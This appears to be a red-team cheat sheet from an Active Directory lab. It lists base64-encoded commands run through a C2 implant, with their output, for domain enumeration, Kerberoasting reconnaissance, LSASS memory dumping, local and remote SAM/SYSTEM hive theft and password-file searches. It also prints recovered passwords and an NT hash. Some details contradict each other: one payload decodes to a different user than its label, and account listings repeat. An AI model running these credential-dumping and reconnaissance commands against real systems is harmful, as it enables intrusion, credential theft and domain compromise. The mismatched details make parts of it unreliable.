sharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyIC1saW1pdCAwCg=='
"CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms"
"CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms"
"CN=SEVENKINGDOMS$,CN=Users,DC=north,DC=sevenkingdoms"
"CN=arya.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=catelyn.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=robb.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=rickon.stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=hodor,CN=Users,DC=north,DC=sevenkingdoms"
"CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms"
"CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms"
"CN=jeor.mormont,CN=Users,DC=north,DC=sevenkingdoms"
"CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms"
List all computers
cat <<'CMD' | base64 -w 0
dsquery computer -limit 0
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSBjb21wdXRlciAtbGltaXQgMAo='
"CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local"
"CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
List all groups
cat <<'CMD' | base64 -w 0
dsquery group -limit 0
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSBncm91cCAtbGltaXQgMAo='
"CN=Administrators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Guests,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Print Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Backup Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Replicator,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Remote Desktop Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Network Configuration Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Performance Monitor Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Performance Log Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Distributed COM Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=IIS_IUSRS,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Cryptographic Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Event Log Readers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Certificate Service DCOM Access,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=RDS Remote Access Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=RDS Endpoint Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=RDS Management Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Hyper-V Administrators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Access Control Assistance Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Remote Management Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Storage Replica Administrators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Domain Computers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Controllers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Cert Publishers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Admins,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Users,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Guests,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Group Policy Creator Owners,CN=Users,DC=north,DC=sevenkingdoms"
"CN=RAS and IAS Servers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Server Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Account Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Windows Authorization Access Group,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Terminal Server License Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Allowed RODC Password Replication Group,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Denied RODC Password Replication Group,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Read-only Domain Controllers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Cloneable Domain Controllers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Protected Users,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Key Admins,CN=Users,DC=north,DC=sevenkingdoms"
"CN=DnsAdmins,CN=Users,DC=north,DC=sevenkingdoms"
"CN=DnsUpdateProxy,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Mormont,CN=Users,DC=north,DC=sevenkingdoms"
List all domain controllers
cat <<'CMD' | base64 -w 0
dsquery server
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSBzZXJ2ZXIK'
"CN=WINTERFELL,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sevenkingdoms,DC=local"
List all containers
cat <<'CMD' | base64 -w 0
dsquery * domainroot -filter "(objectClass=container)" -limit 0
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIGRvbWFpbnJvb3QgLWZpbHRlciAiKG9iamVjdENsYXNzPWNvbnRhaW5lcikiIC1saW1pdCAwCg=='
"CN=Users,DC=north,DC=sevenkingdoms,DC=local"
"CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
"CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=MicrosoftDNS,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=WinsockServices,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=RpcServices,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=Meetings,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN={3FF72B95...9},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=Machine,CN={3FF...},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=User,CN={3FF72...},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN={31B2F340-...},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
List all Organizational Units
cat <<'CMD' | base64 -w 0
dsquery * domainroot -filter "(objectClass=organizationalUnit)" -limit 0
CMD
Find users in a specific OU
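# Users directly under a given OU.
# NOTE: nothing in this lab's listings shows an OU named "stark" (the computer
# query shows only OU=Domain Controllers, and "Stark" is a group under
# CN=Users), so expect no results here; substitute a DN from the
# organizationalUnit query above.
cat <<'CMD' | base64 -w 0
dsquery user "OU=stark,DC=north,DC=sevenkingdoms,DC=local"
CMD
# Fix: the published payload was missing its trailing '=' padding, which strict
# decoders such as .NET's Convert.FromBase64String reject; this is the padded value.
sharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyICJPVT1zdGFyayxEQz1ub3J0aCxEQz1zZXZlbmtpbmdkb21zLERDPWxvY2FsIgo='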
List disabled accounts
cat <<'CMD' | base64 -w 0
dsquery user -disabled
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyIC1kaXNhYmxlZAo='
"CN=Guest,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
"CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
List computers that have been inactive for 2 weeks
cat <<'CMD' | base64 -w 0
dsquery computer -inactive 2
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSBjb21wdXRlciAtaW5hY3RpdmUgMgo='
"CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local"
List users with SPNs
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectClass=user)(servicePrincipalName=*))" -attr samAccountName servicePrincipalName
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENsYXNzPXVzZXIpKHNlcnZpY2VQcmluY2lwYWxOYW1lPSopKSIgLWF0dHIgc2FtQWNjb3VudE5hbWUgc2VydmljZVByaW5jaXBhbE5hbWUK'
samAccountName servicePrincipalName
-------------- --------------------
WINTERFELL$ ldap/winterfell.north.sevenkingdoms.local/...
krbtgt kadmin/changepw
CASTELBLACK$ HTTP/winterfell.north.sevenkingdoms.local;WSMAN/...
jon.snow CIFS/thewall.north.sevenkingdoms.local;HTTP/...
sql_svc MSSQLSvc/castelblack.north.sevenkingdoms.local;MSSQLSvc...
List users with adminCount=1 (SDProp sets adminCount on members of protected groups and does not clear it when an account is removed, so this list can include stale, formerly privileged accounts - confirm against current group membership)
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectClass=user)(adminCount=1))" -attr samAccountName whenCreated
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENsYXNzPXVzZXIpKGFkbWluQ291bnQ9MSkpIiAtYXR0ciBzYW1BY2NvdW50TmFtZSB3aGVuQ3JlYXRlZAo='
samAccountName whenCreated
Administrator 01/09/2026 22:34:32
vagrant 01/09/2026 22:34:32
krbtgt 01/09/2026 22:47:20
eddard.stark 01/09/2026 23:05:44
catelyn.stark 01/09/2026 23:05:46
robb.stark 01/09/2026 23:05:49
List all user accounts
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectCategory=person)(objectClass=user))" -limit 0 -attr samAccountName displayName
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENhdGVnb3J5PXBlcnNvbikob2JqZWN0Q2xhc3M9dXNlcikpIiAtbGltaXQgMCAtYXR0ciBzYW1BY2NvdW50TmFtZSBkaXNwbGF5TmFtZQo='
samAccountName displayName
Administrator
Guest
vagrant Vagrant
krbtgt
SEVENKINGDOMS$
arya.stark
eddard.stark
catelyn.stark
robb.stark
sansa.stark
brandon.stark
rickon.stark
hodor
jon.snow
samwell.tarly
jeor.mormont
sql_svc
List domain admins
cat <<'CMD' | base64 -w 0
dsquery group -name "Domain Admins" | dsget group -members
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSBncm91cCAtbmFtZSAiRG9tYWluIEFkbWlucyIgfCBkc2dldCBncm91cCAtbWVtYmVycwo='
"CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
"CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
List accounts with password never expires flag
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" -attr samAccountName pwdLastSet
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENsYXNzPXVzZXIpKHVzZXJBY2NvdW50Q29udHJvbDoxLjIuODQwLjExMzU1Ni4xLjQuODAzOj02NTUzNikpIiAtYXR0ciBzYW1BY2NvdW50TmFtZSBwd2RMYXN0U2V0Cg=='
samAccountName pwdLastSet
Administrator 134124706723532020
vagrant 132652931567654449
arya.stark 134124735418856253
eddard.stark 134124735444642266
catelyn.stark 134124735468076119
robb.stark 134124735490579496
sansa.stark 134124735513077107
rickon.stark 134124735558382658
hodor 134124735580191642
samwell.tarly 134124735624787445
jeor.mormont 134124735647289151
sql_svc 134124735667599014
Guest 0
brandon.stark 134124735535887980
jon.snow 134124735601664483
List detailed user information
cat <<'CMD' | base64 -w 0
dsquery user -limit 0 | dsget user -samid -email -desc -disabled
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyIC1saW1pdCAwIHwgZHNnZXQgdXNlciAtc2FtaWQgLWVtYWlsIC1kZXNjIC1kaXNhYmxlZAo='
desc samid email disabled
Built-in account Administrator no
Built-in account Guest yes
Vagrant User vagrant no
Key Distribution Center Service Account krbtgt yes
SEVENKINGDOMS$ no
Arya Stark arya.stark no
Eddard Stark eddard.stark no
Catelyn Stark catelyn.stark no
Robb Stark robb.stark no
Sansa Stark sansa.stark no
Brandon Stark brandon.stark no
Rickon Stark rickon.stark no
Brainless Giant hodor no
Jon Snow jon.snow no
Samwell Tarly (Password : Heartsbane) samwell.tarly no
Jeor Mormont jeor.mormont no
sql service sql_svc no
dsget succeeded
List computer information
cat <<'CMD' | base64 -w 0
dsquery computer -limit 0 | dsget computer
CMD
sharpsh -t 20 -- '-e -c ZHNxdWVyeSBjb21wdXRlciAtbGltaXQgMCB8IGRzZ2V0IGNvbXB1dGVyCg=='
dn desc
CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local
CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
dsget succeeded
ACTIVE DIRECTORY – SETSPN ENUM
List all SPNs in the domain
cat <<'CMD' | base64 -w 0
setspn -Q */*
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1RICovKgo='
Checking domain DC=north,DC=sevenkingdoms,DC=local CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local kadmin/changepw CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local HTTP/eyrie.north.sevenkingdoms.local CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local CIFS/thewall.north.sevenkingdoms.local HTTP/thewall.north.sevenkingdoms.local CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local MSSQLSvc/castelblack.north.sevenkingdoms.local MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local ...
List SPNs for a specific service type
cat <<'CMD' | base64 -w 0
setspn -Q MSSQLSvc/*
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1RIE1TU1FMU3ZjLyoK'
Checking domain DC=north,DC=sevenkingdoms,DC=local
CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local
MSSQLSvc/castelblack.north.sevenkingdoms.local
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433
List SPNs for a specific host
cat <<'CMD' | base64 -w 0
setspn -L castelblack
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1MIGNhc3RlbGJsYWNrCg=='
Registered ServicePrincipalNames for CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local:
HTTP/winterfell.north.sevenkingdoms.local
WSMAN/castelblack
WSMAN/castelblack.north.sevenkingdoms.local
TERMSRV/CASTELBLACK
TERMSRV/castelblack.north.sevenkingdoms.local
RestrictedKrbHost/CASTELBLACK
HOST/CASTELBLACK
List duplicate SPNs
cat <<'CMD' | base64 -w 0
setspn -X
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1YCg=='
Checking domain DC=north,DC=sevenkingdoms,DC=local Processing entry 0 Processing entry 0 found 0 group of duplicate SPNs.
List HTTP SPNs
cat <<'CMD' | base64 -w 0
setspn -Q HTTP/*
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1RIEhUVFAvKgo='
Checking domain DC=north,DC=sevenkingdoms,DC=local
CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
HTTP/eyrie.north.sevenkingdoms.local
CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
CIFS/thewall.north.sevenkingdoms.local
HTTP/thewall.north.sevenkingdoms.local
CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
HTTP/winterfell.north.sevenkingdoms.local
...
List specific service accounts
cat <<'CMD' | base64 -w 0
setspn -Q */* | findstr /i "svc"
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1RICovKiB8IGZpbmRzdHIgL2kgInN2YyIK'
CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local
MSSQLSvc/castelblack.north.sevenkingdoms.local
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433
List all SPNs and filter for user accounts
cat <<'CMD' | base64 -w 0
setspn -Q */* > spns.txt
CMD
sharpsh -t 20 -- '-e -c c2V0c3BuIC1RICovKiA+IHNwbnMudHh0Cg=='
cat spns.txt
ACTIVE DIRECTORY – NET
List domain users
cat <<'CMD' | base64 -w 0
net user /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IHVzZXIgL2RvbWFpbgo='
User accounts for \\winterfell.north.sevenkingdoms.local
----------------------------------------------------------
Administrator arya.stark brandon.stark
catelyn.stark eddard.stark Guest
hodor jeor.mormont jon.snow
krbtgt rickon.stark jeor.mormont
samwell.tarly sansa.stark sql_svc
vagrant
List details on specific user
cat <<'CMD' | base64 -w 0
net user jeor.mormont /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IHVzZXIgcm9iYi5zdGFyayAvZG9tYWluCg=='
User name jeor.mormont Full Name Comment Robb Stark User's comment Country/region code 000 (System Default) Account active Yes Account expires Never ...
List domain groups
cat <<'CMD' | base64 -w 0
net group /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IGdyb3VwIC9kb21haW4K'
Group Accounts for \\winterfell.north.sevenkingdoms.local
------------------------------------------------------
...
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Group Policy Creator Owners
*Key Admins
*Mormont
*Night Watch
*Protected Users
*Read-only Domain Controllers
*Stark
List domain admins
cat <<'CMD' | base64 -w 0
net group "Domain Admins" /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAvZG9tYWluCg=='
Members
---------------------------------------------------------
Administrator eddard.stark
The command completed successfully.
List enterprise admins
cat <<'CMD' | base64 -w 0
net group "Enterprise Admins" /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IGdyb3VwICJFbnRlcnByaXNlIEFkbWlucyIgL2RvbWFpbgo='
List local admins on current machine
cat <<'CMD' | base64 -w 0
net localgroup administrators
CMD
sharpsh -t 20 -- '-e -c bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMK'
Members
----------------------------------------------------------
Administrator
NORTH\Domain Admins
NORTH\jeor.mormont
vagrant
List domain password policy
cat <<'CMD' | base64 -w 0
net accounts /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IGFjY291bnRzIC9kb21haW4K'
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 37201
Minimum password length: 5
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 5
Lockout observation window (minutes): 5
Computer role: PRIMARY
List domain controllers
cat <<'CMD' | base64 -w 0
net group "Domain Controllers" /domain
CMD
sharpsh -t 20 -- '-e -c bmV0IGdyb3VwICJEb21haW4gQ29udHJvbGxlcnMiIC9kb21haW4K'
Members
---------------------------------------------------------
WINTERFELL$
The command completed successfully.
REMOTE ENUM W/ WMI
List operating system information on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_OperatingSystem -ComputerName CASTELBLACK | Select-Object CSName, Caption, Version, BuildNumber, OSArchitecture, LastBootUpTime
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfT3BlcmF0aW5nU3lzdGVtIC1Db21wdXRlck5hbWUgQ0FTVEVMQkxBQ0sgfCBTZWxlY3QtT2JqZWN0IENTTmFtZSwgQ2FwdGlvbiwgVmVyc2lvbiwgQnVpbGROdW1iZXIsIE9TQXJjaGl0ZWN0dXJlLCBMYXN0Qm9vdFVwVGltZQo='
CSName : CASTELBLACK
Caption : Microsoft Windows Server 2019
Version : 10.0.17763
BuildNumber : 17763
OSArchitecture : 64-bit
LastBootUpTime : 20260111111629.500000-480
List scheduled tasks on remote system
cat <<'CMD' | base64 -w 0
schtasks /query /s WINTERFELL /fo LIST /v | Select-String -Pattern 'TaskName:|Run As User:|Task To Run:|Next Run Time:|Last Run Time:'
CMD
sharpsh -t 20 -- '-e -c c2NodGFza3MgL3F1ZXJ5IC9zIFdJTlRFUkZFTEwgL2ZvIExJU1QgL3YgfCBTZWxlY3QtU3RyaW5nIC1QYXR0ZXJuICdUYXNrTmFtZTp8UnVuIEFzIFVzZXI6fFRhc2sgVG8gUnVuOnxOZXh0IFJ1biBUaW1lOnxMYXN0IFJ1biBUaW1lOicK'
TaskName: ...\WindowsColorSystem\Calibration Loader
Next Run Time: N/A
Last Run Time: 1/16/2026 1:10:45 PM
Task To Run: COM handler
Run As User: Users
TaskName: ...\WindowsUpdate\Scheduled Start
Next Run Time: N/A
Last Run Time: 12/6/2025 7:32:49 AM
Task To Run: C:\Windows\system32\sc.exe start wuauserv
Run As User: SYSTEM
List processes on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Process -ComputerName CASTELBLACK | Select-Object ProcessName, ProcessId, CommandLine, CreationDate | Sort-Object CreationDate -Descending
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUHJvY2VzcyAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLIHwgU2VsZWN0LU9iamVjdCBQcm9jZXNzTmFtZSwgUHJvY2Vzc0lkLCBDb21tYW5kTGluZSwgQ3JlYXRpb25EYXRlIHwgU29ydC1PYmplY3QgQ3JlYXRpb25EYXRlIC1EZXNjZW5kaW5nCg=='
ProcessName ProcessId
----------- ---------
notepad.exe 6992
conhost.exe 6316
powershell.exe 3088
svchost.exe 6776
ApplicationFrameHost.exe 3660
SystemSettings.exe 7072
...
List installed software on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Product -ComputerName CASTELBLACK | Select-Object Name, Version, Vendor, InstallDate
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUHJvZHVjdCAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBWZXJzaW9uLCBWZW5kb3IsIEluc3RhbGxEYXRlCg=='
Name Version
---- -------
Kits Configuration Installer 10.1.26100.6901
Windows SDK for Windows ... 10.1.26100.6901
WPTx64 (DesktopEditions) 10.1.26100.6901
Windows SDK DirectX x86 ... 10.1.26100.6901
List logged-in users on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_ComputerSystem -ComputerName CASTELBLACK | Select-Object Name, UserName
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyB8IFNlbGVjdC1PYmplY3QgTmFtZSwgVXNlck5hbWUK'
Name UserName
---- --------
CASTELBLACK NORTH\jeor.mormont
List services on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Service -ComputerName CASTELBLACK | Select-Object Name, State, StartMode, PathName, StartName | Where-Object {$_.State -eq "Running"}
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfU2VydmljZSAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBTdGF0ZSwgU3RhcnRNb2RlLCBQYXRoTmFtZSwgU3RhcnROYW1lIHwgV2hlcmUtT2JqZWN0IHskXy5TdGF0ZSAtZXEgIlJ1bm5pbmcifQo='
Name : CDPUserSvc_5b365 State : Running StartMode : Auto PathName : C:\Windows\system32\svchost.exe -k UnistackSvcGroup StartName : Name : WpnUserService_5b365 State : Running StartMode : Auto PathName : C:\Windows\system32\svchost.exe -k UnistackSvcGroup StartName :
CRED DUMPING – LOCAL
First, get the process ID of LSASS
cat <<'CMD' | base64 -w 0
$lsass = Get-Process lsass;$lsassPid = $lsass.Id;rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full
CMD
sharpsh -t 20 -- '-e -c JGxzYXNzID0gR2V0LVByb2Nlc3MgbHNhc3M7JGxzYXNzUGlkID0gJGxzYXNzLklkO3J1bmRsbDMyLmV4ZSBDOlxXaW5kb3dzXFN5c3RlbTMyXGNvbXN2Y3MuZGxsLCBNaW5pRHVtcCAkbHNhc3NQaWQgQzpcdGVtcFxsc2Fzcy5kbXAgZnVsbAo='
If privileged, should see lsass.dmp in C:\temp
Move to kali
download lsass.dmp
and run:
pypykatz lsa minidump lsass.dmp
== Kerberos ==
Username: jeor.mormont
Domain: NORTH.SEVENKINGDOMS.LOCAL
Password: _L0ngCl@w_
password (hex)5f004c0030006e00670043006c00400077005f0000000000
Save the SAM, SYSTEM and SECURITY hives
cat <<'CMD' | base64 -w 0
reg save HKLM\SAM C:\temp\sam.hive;reg save HKLM\SYSTEM C:\temp\system.hive;reg save HKLM\SECURITY C:\temp\security.hive
CMD
sharpsh -t 20 -- '-e -c cmVnIHNhdmUgSEtMTVxTQU0gQzpcdGVtcFxzYW0uaGl2ZTtyZWcgc2F2ZSBIS0xNXFNZU1RFTSBDOlx0ZW1wXHN5c3RlbS5oaXZlO3JlZyBzYXZlIEhLTE1cU0VDVVJJVFkgQzpcdGVtcFxzZWN1cml0eS5oaXZlCg=='
-rw-rw-rw- sam.hive 56.0 KiB
-rw-rw-rw- security.hive 68.0 KiB
-rw-rw-rw- system.hive 18.4 MiB
Move to kali
download sam.hive
download security.hive
download system.hive
secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: ...
CRED DUMPING – REMOTE
Check if RemoteRegistry service is running on target
cat <<'CMD' | base64 -w 0
Get-Service -Name RemoteRegistry -ComputerName CASTELBLACK
CMD
sharpsh -t 20 -- '-e -c R2V0LVNlcnZpY2UgLU5hbWUgUmVtb3RlUmVnaXN0cnkgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSwo='
Status Name DisplayName
------ ---- -----------
Stopped RemoteRegistry Remote Registry
Start it if it’s not running
cat <<'CMD' | base64 -w 0
Get-Service -Name RemoteRegistry -ComputerName CASTELBLACK | Start-Service
CMD
sharpsh -t 20 -- '-e -c R2V0LVNlcnZpY2UgLU5hbWUgUmVtb3RlUmVnaXN0cnkgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyB8IFN0YXJ0LVNlcnZpY2UK'
Then rerun the check above (Get-Service -Name RemoteRegistry) to confirm it is now running:
Status Name DisplayName
------ ---- -----------
Running RemoteRegistry Remote Registry
Connect to remote registry and save hives
cat <<'CMD' | base64 -w 0
reg save \\CASTELBLACK\HKLM\SAM C:\temp\remote_sam.hive;reg save \\CASTELBLACK\HKLM\SYSTEM C:\temp\remote_system.hive
CMD
sharpsh -t 20 -- '-e -c cmVnIHNhdmUgXFxDQVNURUxCTEFDS1xIS0xNXFNBTSBDOlx0ZW1wXHJlbW90ZV9zYW0uaGl2ZTtyZWcgc2F2ZSBcXENBU1RFTEJMQUNLXEhLTE1cU1lTVEVNIEM6XHRlbXBccmVtb3RlX3N5c3RlbS5oaXZlCg=='
C:\temp (2 items, 18.2 MiB)
===========================
-rw-rw-rw- remote_sam.hive 56.0 KiB
-rw-rw-rw- remote_system.hive 18.1 MiB
CREDS SEARCHING
Search for files that might contain passwords
Get-ChildItem C:\ -Recurse -Include *.txt,*.xml,*.ini,*.config,*.ps1,*.bat,*.cmd -ErrorAction SilentlyContinue | Select-String -Pattern "password" -CaseSensitive:$false | Group-Object Path | Select-Object Name
This did not work with sliver:
[!] rpc error: code = Unknown desc = Could not load CLR runtime host
List unattended installation xml
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Windows\Panther\ -Recurse -Include unattend.xml,autounattend.xml -ErrorAction SilentlyContinue
CMD
sharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxXaW5kb3dzXFBhbnRoZXJcIC1SZWN1cnNlIC1JbmNsdWRlIHVuYXR0ZW5kLnhtbCxhdXRvdW5hdHRlbmQueG1sIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlCg=='
Directory: C:\Windows\Panther
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/22/2025 10:04 AM 2475 unattend.xml
List GPP files
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Windows\SYSVOL\ -Recurse -Include Groups.xml,Services.xml,Scheduledtasks.xml,DataSources.xml,Printers.xml,Drives.xml -ErrorAction SilentlyContinue
CMD
sharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxXaW5kb3dzXFNZU1ZPTFwgLVJlY3Vyc2UgLUluY2x1ZGUgR3JvdXBzLnhtbCxTZXJ2aWNlcy54bWwsU2NoZWR1bGVkdGFza3MueG1sLERhdGFTb3VyY2VzLnhtbCxQcmludGVycy54bWwsRHJpdmVzLnhtbCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo='
Looks like it worked, just no findings
List VNC files
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\ -Recurse -Include ultravnc.ini,vnc.ini -ErrorAction SilentlyContinue
CMD
sharpsh -t 40 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlwgLVJlY3Vyc2UgLUluY2x1ZGUgdWx0cmF2bmMuaW5pLHZuYy5pbmkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUK'
